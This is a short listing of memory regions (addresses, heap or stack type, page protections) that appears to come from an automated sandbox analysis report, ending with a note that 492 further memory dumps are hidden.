||
|
2852AD3A000
|
trusted library allocation
|
page read and write
|
||
|
1D38AA02000
|
heap
|
page read and write
|
||
|
23E5B210000
|
heap
|
page readonly
|
||
|
2852619B000
|
heap
|
page read and write
|
||
|
1D38AB88000
|
heap
|
page read and write
|
||
|
2852619B000
|
heap
|
page read and write
|
||
|
1D38A08A000
|
heap
|
page read and write
|
||
|
5CF61A9000
|
stack
|
page read and write
|
||
|
1D38AB94000
|
heap
|
page read and write
|
There are 492 hidden memdumps, click here to show them.